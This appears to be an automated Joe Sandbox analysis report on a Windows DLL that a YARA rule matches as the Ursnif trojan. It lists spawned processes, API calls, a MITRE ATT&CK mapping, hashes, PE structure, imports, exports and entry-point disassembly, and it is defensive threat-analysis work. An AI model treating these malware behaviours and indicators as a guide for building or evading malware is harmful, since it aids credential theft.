Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: loaddll32.exe, 00000000.00000002.549620718.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.574472644.0000000003900000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.613558655.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.613557283.0000000003540000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.500091312.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.597280299.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.496937623.0000000003570000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.549620718.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.574472644.0000000003900000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.613558655.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.613557283.0000000003540000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.500091312.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.597280299.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.496937623.0000000003570000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.549620718.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.574472644.0000000003900000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.613558655.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.613557283.0000000003540000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.500091312.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.597280299.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.496937623.0000000003570000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.549620718.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.574472644.0000000003900000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.613558655.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.613557283.0000000003540000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.500091312.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.597280299.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.496937623.0000000003570000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.549620718.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.574472644.0000000003900000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.613558655.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 0000000C.00000002.613557283.0000000003540000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.500091312.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000014.00000002.597280299.00000000031B0000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.496937623.0000000003570000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDF0604 cpuid

0_2_6DDF0604

Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6DE2DD96
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DE2DF65
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DE23952
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6DE2E518
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6DE2E6EC
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DE2E61F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DDEF1B7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6DE2E19F
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DE2E112
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DE2E077
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DE2E00E
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DE2E3EF
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoEx,	0_2_6DDEF364
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DE24323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6DE2DD96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6DE2DF65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6DE23952
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6DE2E518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6DE2E6EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6DE2E61F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6DDEF1B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_6DE2E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6DE2E112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6DE2E077
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6DE2E00E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6DE2E3EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	2_2_6DDEF364
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6DE24323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	3_2_6DDB1566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_6DE2DD96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	15_2_6DE2DF65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	15_2_6DE23952
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_6DE2E518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_6DE2E6EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	15_2_6DE2E61F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	15_2_6DDEF1B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_6DE2E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	15_2_6DE2E112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	15_2_6DE2E077
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	15_2_6DE2E00E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	15_2_6DE2E3EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	15_2_6DDEF364
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	15_2_6DE24323

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDF09F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6DDF09F0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DE28951 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_6DE28951

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6DDB146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

3_2_6DDB146C

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match

File source: 3.2.rundll32.exe.6ddb0000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match

File source: 3.2.rundll32.exe.6ddb0000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDB16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		0_2_6DDB16BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DDB16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		15_2_6DDB16BC

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection12	Rundll321	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery23	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	408918
Start date:	09.05.2021
Start time:	08:12:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CJxeLKU314.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.troj.winDLL@55/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.4% (good quality ratio 18.1%) Quality average: 73.5% Quality standard deviation: 27.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.79005679894035
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CJxeLKU314.dll
File size:	960000
MD5:	e4c188ae2a8d453b361d339022a04221
SHA1:	0f2375eeb872fd5d5021145a56eae8529cedfbdb
SHA256:	0fa5df74d9d08845440766c204ae874a81a189b9856e2b841665eb9054040b4b
SHA512:	ec6d7c7a38530c16c71a5d638106b0ea68d094789a58e2148c9e12a2b916cb310b217f5da0c043357eea2745a171104390877e8d085ab39c21332b90d908f5c8
SSDEEP:	24576:HQfpzjXPgfX8CJV4X+IBIJ3cazaLwj1mCG9CpNiLi:IFDgrJV4OaIRj150CpNiLi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0...0...0....{i.3...9...#...b...4...b...=...b...=....{r.&...0.......b.......b...1...b.b.1...0...1...b...1...Rich0..........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1040052
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5AC512FB [Wed Apr 4 18:01:31 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7a79d10b1d4343a18a4f6e25e165b4ae

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F9DCC95CE47h
call 00007F9DCC95D822h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F9DCC95CCEFh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F9DCC95C656h
jmp 00007F9DCC95CE20h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007F9DCC95C645h
jmp 00007F9DCC95CE0Fh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe35b0	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe364c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfd000	0x9d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfe000	0x5074	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xde820	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xde878	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8a000	0x26c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x883dc	0x88400	False	0.544624426606	data	6.71832868398	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8a000	0x5a440	0x5a600	False	0.658643456086	data	5.95813601066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe5000	0x17ebc	0x1c00	False	0.184291294643	data	4.04646123564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xfd000	0x9d0	0xa00	False	0.396484375	data	3.77819611332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfe000	0x5074	0x5200	False	0.726133765244	data	6.63977268899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0xfd1c0	0x10e	data	English	United States
RT_DIALOG	0xfd2d0	0xc0	dBase III DBT, next free block index 4294901761	English	United States
RT_DIALOG	0xfd390	0x126	data	English	United States
RT_DIALOG	0xfd4b8	0xf0	data	English	United States
RT_DIALOG	0xfd5a8	0xba	data	English	United States
RT_DIALOG	0xfd664	0xec	data	English	United States
RT_DIALOG	0xfd750	0x124	data	English	United States
RT_MANIFEST	0xfd874	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetProcessHeap, CreateFileW, SetStdHandle, ReadConsoleW, WriteConsoleW, HeapSize, SetEndOfFile, SetEnvironmentVariableW, GetOEMCP, IsValidCodePage, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, GetTimeZoneInformation, OutputDebugStringA, OutputDebugStringW, WaitForSingleObjectEx, CreateSemaphoreA, GetSystemTimeAsFileTime, TlsGetValue, VirtualProtectEx, TlsAlloc, GetSystemDirectoryA, GetTempPathA, Sleep, GetCommandLineA, GetModuleHandleA, InitializeCriticalSection, SetSystemPowerState, EnterCriticalSection, VirtualProtect, GetModuleFileNameA, MultiByteToWideChar, GetLastError, FormatMessageW, WideCharToMultiByte, GetStringTypeW, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetACP, GetStdHandle, GetFileType, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessA, CreateProcessW, GetFileAttributesExW, WriteFile, GetConsoleCP, GetConsoleMode, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, ReadFile, SetFilePointerEx, HeapReAlloc, SetConsoleCtrlHandler, CreateThread
USER32.dll	SetFocus, GetCursorPos, RegisterClassExA, GetFocus, GetClassInfoExA, GetKeyNameTextA, GetWindowTextLengthA, CallWindowProcA, IsDlgButtonChecked, DestroyIcon, AppendMenuA, DrawIconEx, DrawEdge
GDI32.dll	BitBlt, DeleteDC, CreatePen, DeleteObject, CreateDCA, GetObjectA, DPtoLP
ole32.dll	OleUninitialize, OleSetContainedObject, OleInitialize
SHLWAPI.dll	PathFindFileNameA, PathAddBackslashW, PathStripToRootA
DCIMAN32.dll	DCICreatePrimary, DCIOpenProvider, GetDCRegionData, DCISetDestination, DCICloseProvider, DCICreateOverlay, GetWindowRegionData, DCIEndAccess, WinWatchDidStatusChange, DCICreateOffscreen, DCISetSrcDestClip, DCIDestroy, DCIDraw, DCISetClipList, DCIEnum, DCIBeginAccess, WinWatchClose

Exports

Name	Ordinal	Address
Connectdark	1	0x1021c64
Mindlake	2	0x1020de0
Porthigh	3	0x1021c2c
Problemscale	4	0x1021bf8
WingGrass	5	0x1021b0a

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 2964 Parent PID: 5704

General

Start time:	08:13:27
Start date:	09/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll'
Imagebase:	0x1e0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4036 Parent PID: 2964

General

Start time:	08:13:28
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4676 Parent PID: 2964

General

Start time:	08:13:28
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Connectdark
Imagebase:	0x1190000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4672 Parent PID: 4036

General

Start time:	08:13:28
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1
Imagebase:	0x1190000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5984 Parent PID: 4676

General

Start time:	08:13:28
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5504 Parent PID: 4672

General

Start time:	08:13:29
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1140 Parent PID: 5984

General

Start time:	08:13:29
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5664 Parent PID: 5504

General

Start time:	08:13:29
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4924 Parent PID: 4676

General

Start time:	08:13:29
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x7ff797770000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4308 Parent PID: 4672

General

Start time:	08:13:30
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5972 Parent PID: 4924

General

Start time:	08:13:30
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
